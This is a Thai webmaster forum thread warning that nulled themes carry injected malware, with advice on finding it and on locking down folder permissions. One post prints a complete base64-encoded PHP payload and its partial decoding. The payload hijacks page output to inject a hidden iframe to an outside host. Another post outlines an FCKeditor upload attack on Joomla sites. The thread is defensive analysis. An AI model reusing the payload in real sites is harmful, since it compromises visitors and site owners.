ต่อไป »

[reactionkz]

ขอบคุณคราบบที่มาเตือนแต่เหมือนจะโดนแล้ว

[system-4x]

นี่มัน shell ดีๆนี่เอง

เหมือนกับได้เครื่องมาฟรีๆ 

[seonew]

ฐานสแปมเมล์อย่างดีเลย เช็คดีๆ งานอาจงอกได้  ผมเลิกใช้ล่ะพวกธีม null ทั้งหลายแหล่  ไม่โดนแฮกก็โดนใช้ประโยชน์ 

[wasantec]

ความรู้ 

[jengseo01]

ขอบคุณครับ

[Juststarted]

  ผมก็เจอครับ ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย

[iczykung]

ผมก็เจอครับ ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย

งานงอกเลยครับอิอิ  สู้ๆ นะครับ

[hastyman]

**เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked

ผมเจอมาแล้วครับ มันจะฝัง script malware แถมมาให้เราด้วยครับ  เช่น  เวลาคลิ๊กเข้าเว็บเราผ่านทาง google search จะวิ่งไปเว็บมันซะงั้น

สำหรับการแก้ปัญหาเบื้องต้น   ง่ายๆ ครับ เปิด file php ทีล่ะไฟล์แล้ว search หา

โค๊ด:

eval(base64_decode   

ส่วนใหญ่มันจะอยู่ในลักษณะนี้นะครับ

โค๊ด:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2NiU3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRSU2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>

อะไรประมาณนี้ครับ  มันจะฝังอยู่ บรรทัดแรกของไฟล์ PHP ทุกไฟล์


เมื่อผมทำการถอดรหัสแล้ว  ปลาดุก.... แอร้ยยย ปรากฏว่าเจอแบบนี้ครับ

โค๊ด:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; 
if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return ''; } return ""; } } 
if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; 
if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } 
function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); 
if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

เพื่อนๆ คงจะเดาออกนะครับว่ามันคืออะไร  

น่ากลัวป่ะล่าาาาาาาาาาาาาา  

หรือเพื่อนๆ สามารถตรวจสอบ Malware ในเว็บได้ที่
วิธีตรวจสอบ Malware ในเว็บไซต์


ปล.เพิ่มตัวอย่าง Code จริงๆ
ปล2.ขอบคุณสำหรับน้ำใจที่ทุกท่าน Thank ให้นะครับ 

แบบนี้ใครจะรู้บ้าง

นอกจาก โปรแกรมเมอร์

 

[iczykung]

ลองเข้าไปเช็คตามลิงค์ที่ผมให้ไปครับ จะรู้ว่าเว็บเราติดไหม

[solutioncom]

สำหรับ joomla ตัวที่โหลดมาใช้กัน มันไม่มี สคริปฝังติดมาครับ
แต่สคริปจะถูกเขียนทับขึ้นมาใหม่ อันนี้ยังสรุปไม่ได้ว่าเกิดจากการเช็คของเจ้าของ template แล้วมาเขียนทับ หรือว่าโดนอย่างอื่น
บางสคริปโดนเขียนทับใน libraries ก็มีแต่ก็หาไม่ยากเท่าไร ทางที่ดีแนะนำว่าตอนขึ้น host จริง ให้ทำการตั้งค่า permission ของโฟลเดอร์ต่างๆให้เรียบร้อย เวลาจะแก้ไขอะไรก็ค่อยไปเปิดเพื่อทำการแก้ไข แล้วก็ปิดให้เรียบร้อย รับรองว่าไม่ว่าจะเกิดจากอะไรก็ตาม ยังไงก็เขียนทับไฟล์ไม่ได้ นอกจากจะโดนขั้นเทพ 

[flash]

เข้ารหัสได้ยาวจริงๆ ครับ +1

[Juststarted]

ผมก็เจอครับ ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย

งานงอกเลยครับอิอิ  สู้ๆ นะครับ

ท่านพอจะมีแนวทางจัดการหน่อยมั้ย ผมพยายามแล้วมันปฎิเสธ

[iczykung]

สำหรับ joomla ตัวที่โหลดมาใช้กัน มันไม่มี สคริปฝังติดมาครับ
แต่สคริปจะถูกเขียนทับขึ้นมาใหม่ อันนี้ยังสรุปไม่ได้ว่าเกิดจากการเช็คของเจ้าของ template แล้วมาเขียนทับ หรือว่าโดนอย่างอื่น
บางสคริปโดนเขียนทับใน libraries ก็มีแต่ก็หาไม่ยากเท่าไร ทางที่ดีแนะนำว่าตอนขึ้น host จริง ให้ทำการตั้งค่า permission ของโฟลเดอร์ต่างๆให้เรียบร้อย เวลาจะแก้ไขอะไรก็ค่อยไปเปิดเพื่อทำการแก้ไข แล้วก็ปิดให้เรียบร้อย รับรองว่าไม่ว่าจะเกิดจากอะไรก็ตาม ยังไงก็เขียนทับไฟล์ไม่ได้ นอกจากจะโดนขั้นเทพ  

สำหรับช่องโหว่ของ Joomla  ตัวอย่างเว็บกระทรวงนะครับ
โดน hack จาก FCKeditor หรือตัวที่เราใช้โพสบทความนั่นแหละครับ  มันมี function ที่ให้ user upload แล้ว hacker นำเอามาเปลี่ยน /path ไปreplace logo แทน ก็เลยจบข่าวเลยครับ  นอกเหนือจากนี้ยังสามารถ upload php file ไปแทนของเก่าเราได้ด้วยครับเช่น configuration.php
ทางที่ดีแนะนำว่าให้เปลี่ยน ไม่ก็ยกเลิก comment users ไปเลยครับ เอาไว้ admin อย่างเดียวก็พอปลอดภัยที่สุดครับ


 :wanwan011:ปล.ขอบคุณทุกท่านที่ Thank ให้นะครับ  ยินดีให้คำปรึกษาครับ 

[kangtung]

ขอโทษที โพสต์อีกกระทู้ทำไมมาโผล่ที่นี่ไม่รู้

[iczykung]

ใครเจออีกบ้างน้อ 

[brucewayne]

ภัยใกล้ตัวครับ ดันๆๆ

[barbarian]

หัวอกเดียวกัน


เพิ่งจัดการได้ก่อนเข้ามาอ่านกระทู้นี้ นั่งงมตั้งนานนนนนนนนนน


FTP software ใช้ของที่มั่นใจได้นะครับ ไม่งั้นโดนแน่ๆๆๆๆๆ

[zankumuro]

ของแถมๆ 

[CMSHostThailand]

ต้องตรวจสอบดีๆ ทางที่ดีซื้อธีมลิขสิทธิ์มาใช้ค่ะ ปลอดภัย อัพเดตได้ตลอด